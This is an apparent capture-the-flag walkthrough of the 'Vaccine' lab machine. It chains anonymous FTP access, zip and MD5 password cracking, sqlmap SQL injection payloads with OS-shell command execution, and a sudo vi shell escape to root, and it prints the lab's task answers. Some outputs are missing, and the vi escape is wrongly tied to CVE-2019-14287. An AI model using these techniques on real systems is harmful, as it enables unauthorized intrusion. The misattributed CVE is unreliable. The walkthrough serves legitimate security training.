Penetration testing is not simple, it requires lots of
technical knowledge and the capability to think outside of the box. Sometimes
you will find simple yet dangerous vulnerabilities, other times you will find
vulnerabilities where public exploits exist which you can use to get easy
access to the system.
The reality is, most of the time you will need to have
many different vulnerabilities and misconfigurations where you will have to
chain them all together in order to access the system of the target machine, or
you will have a system that doesn't have vulnerabilities, but it has a weak
password which might grant you access to the system.
The vaccine is the machine
that teaches us how enumeration is always the key, even if the system seems to
be secure. Apart from that, it also teaches us how important is password
cracking, it's surprising to know that not everyone has strong passwords.
Enumeration
Click on Spawn Machine to Find out the TARGET IP.
Just, as usual, we start off with the Nmap scan:
┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.57.185
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-29 00:51 IST
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
┌──(mrdev㉿mrdev)-[~]
└─$
There are three ports open, they are 21 (FTP), 22 (SSH), and 80 (HTTP).
Since we don't have any credentials for the SSH service, we will start off with an enumeration of port 21, since the Nmap shows that it allows anonymous login.
This article delves into the techniques hackers use to attempt unauthorized login into systems using credential stuffing and brute force attacks. It provides insights into the methods employed by attackers and offers guidance on how organizations can defend against such threats.
Accessing FTP Server Anonymously with FTP Client Tool
We can see that there is a backup.zip file available, we will have to download it. It will be located in the folder from where we established
the FTP connection.
┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.185
Connected to 10.129.57.185.
220 (vsFTPd 3.0.3)
Name (10.129.57.185:mrdev): Anonymous
331 Please specify the password.
Password: #password Not required
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir # List the Files and Directory
229 Entering Extended Passive Mode (|||10967|)
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
226 Directory send OK.
ftp> get backup.zip# Download the backup.zip file
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10129|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |**************************************************************************| 2533 514.05 KiB/s 00:00 ETA 226 Transfer complete.
2533 bytes received in 00:00 (7.79 KiB/s)
ftp> bye
221 Goodbye.
┌──(mrdev㉿mrdev)-[~]
└─$
Run the ls command to list if the file was downloaded or not:
This article provides guidance on using John the Ripper and Johnny, two popular password cracking tools. It covers their usage and provides examples to illustrate how to effectively utilize these tools for password cracking and security testing purposes.
Decrypting Password-Protected ZIP Files with John The Ripper
John the Ripper comes pre-installed with Parrot OS &
Kali Linux, however, if you don't have it, you can install it from the
repository.
# sudo apt-get install john
To successfully crack the password, we will have to
convert the ZIP into the hash using the zip2john module that comes within John
the Ripper.
┌──(mrdev㉿mrdev)-[~]
└─$ zip2john backup.zip > hash
Once you find out the hash file run the below command to load the wordlist and it will do a brute force
attack against the hash stored in file hashes.
┌──(mrdev㉿mrdev)-[~]
└─$ john --wordlist=rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
We can see the credentials of the admin, which we might be able
to use. But the password seems hashed. We have identified that the hash is in the form of MD5, let's try to crack it online (https://crackstation.net/).
The cracked password is qwerty789. Now we will start our web
browser to enumerate port 80, see where can we log in.
We can see the login page, by supplying the previously found
username & cracked password, we managed to log in successfully!
Foothold
So the dashboard has nothing special in it, however, it has
a catalog, which might be connected to the database.
Let's create any query:
By checking the URL, we can see that there is a variable
search that is responsible for searching through the catalog. We could test it
to see if it's SQL injectable, but instead of doing it manually, we will use a
tool called sqlmap.
This article delves into SQL injection, a prevalent web security vulnerability, explaining its mechanisms, risks, and mitigation techniques. Understanding SQL injection is crucial for developing secure web applications and protecting them from exploitation.
Acquiring OS Shell Access via SQL Injection with SQL Map
The sqlmap comes pre-installed with Parrot OS & Kali
Linux, however, you can install it through the repository if you don't have it
then run the following command:
# sudo apt-get install sqlmap
To see how to use it, we will type the following command:
┌─[mrdev@TS]─[~]
└──╼ $sqlmap --help
___
__H__
___ ___[(]_____ ___ ___ {1.5.12#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
┌─[mrdev@TS]─[~]
└──╼ $
We will provide the URL & the cookie to the sqlmap in
order for it to find the vulnerability. The reason why we have to provide a cookie
is because of authentication.
To grab the cookie, we can intercept any request in Burp
Suite & get it from there, however, you can install a great extension for
your web browser called cookie-editor.
Once the installation is complete you can copy cookies from the cookie editor. The cookies in HTTP
messages of requests are usually set the following way.
There will be some questions that the tool will ask you, you
can respond with 'Yes ' or 'No', or just by pressing ENTER for the default
answer.
___
__H__
___ ___[,]_____ ___ ___ {1.5.12#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:50:33 /2021-12-29/
[01:50:35] [INFO] testing connection to the target URL
[01:50:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:50:37] [INFO] testing if the target URL content is stable
[01:50:38] [INFO] target URL content is stable
[01:50:38] [INFO] testing if GET parameter 'search' is dynamic
[01:50:38] [WARNING] GET parameter 'search' does not appear to be dynamic
[01:50:39] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[01:50:39] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:51:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:51:36] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[01:51:36] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:51:47] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[01:51:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
Out of this output, the thing that is important to us is the
following:
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
The tool confirmed that the target is vulnerable to SQL
injection, which is everything we needed to know.
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=any query';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd
---
[01:51:51] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
[01:51:54] [INFO] fetched data logged to text files under '/home/mrdev/.local/share/sqlmap/output/10.129.57.185'
[*] ending @ 01:51:54 /2021-12-29/
┌──(mrdev㉿mrdev)-[~]
└─$
Now, we will run the sqlmap
once more, where we are going to provide the --os-shell flag, where
we will be able to perform command injection.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[02:14:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=any query' AND (SELECT (CASE WHEN (3932=3932) THEN NULL ELSE CAST((CHR(73)||CHR(76)||CHR(89)||CHR(65)) AS NUMERIC) END)) IS NULL-- BeDf
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=any query' AND 6776=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (6776=6776) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)) AS NUMERIC)-- xFOh
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=any query';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=any query' AND 7887=(SELECT 7887 FROM PG_SLEEP(5))-- qpAd
---
[02:14:38] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[02:14:38] [INFO] fingerprinting the back-end DBMS operating system
[02:14:39] [INFO] the back-end DBMS operating system is Linux
[02:14:40] [INFO] testing if current user is DBA
[02:14:40] [INFO] retrieved: '1'
[02:14:41] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[02:14:41] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
We got the shell, however, it is not very stable &
interactive.
Establishing Reverse Shell via OS Shell Obtained from SQLMap
To make it much more stable, we will use the reverse shell payload:
We are users of Postgres, but we don't know the password for it,
which means we cannot check our sudo privileges. We will try to find the password in the html folder, since
the machine uses both PHP & SQL, meaning that there should be credentials
in cleartext:
Before that, I have to change back the directories to the home
directory:
postgres@vaccine:/var/lib/postgresql/11/main$ cd ../../../../..
cd ../../../../..
postgres@vaccine:/$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png dashboard.js index.php style.css
dashboard.css dashboard.php license.txt
postgres@vaccine:/var/www/html$
Now let me read the dashboard.php file using the cat command:
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$
sudo privilege escalation via vi editor (CVE-2019-14287)
So we have sudo privileges to edit the /etc/postgresql/11/main/pg_hba.conf file
using vi (/bin/vi) text editor add "!/bin/bash" and hit Enter.
The root flag can be obtained in the root folder:
root@vaccine:/var/lib/postgresql# whoami
root
root@vaccine:/var/lib/postgresql#cd /root
root@vaccine:~# ls
pg_hba.conf root.txt snap
root@vaccine:~# cat root.txt
dd****************************9
root@vaccine:~#
We successfully got the root flag, congratulations!
Task Answers
TASK 1: Besides SSH and HTTP, what other service is hosted on this box?
Ans. FTP
TASK 2: This service can be configured to allow login with any password for a specific username. What is that username?
Ans. anonymous
TASK 3: What is the name of the file downloaded over this service?
Ans. backup.zip
TASK 4: What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format to allow for cracking attempts?
Ans. zip2john
TASK 5: What is the password for the admin user on the website?
Ans. qwerty789
TASK 6: What option can be passed to sqlmap to try to get command execution via the sql injection?
Ans. --os-shell
TASK 7: What program can the postgres user run as root using sudo?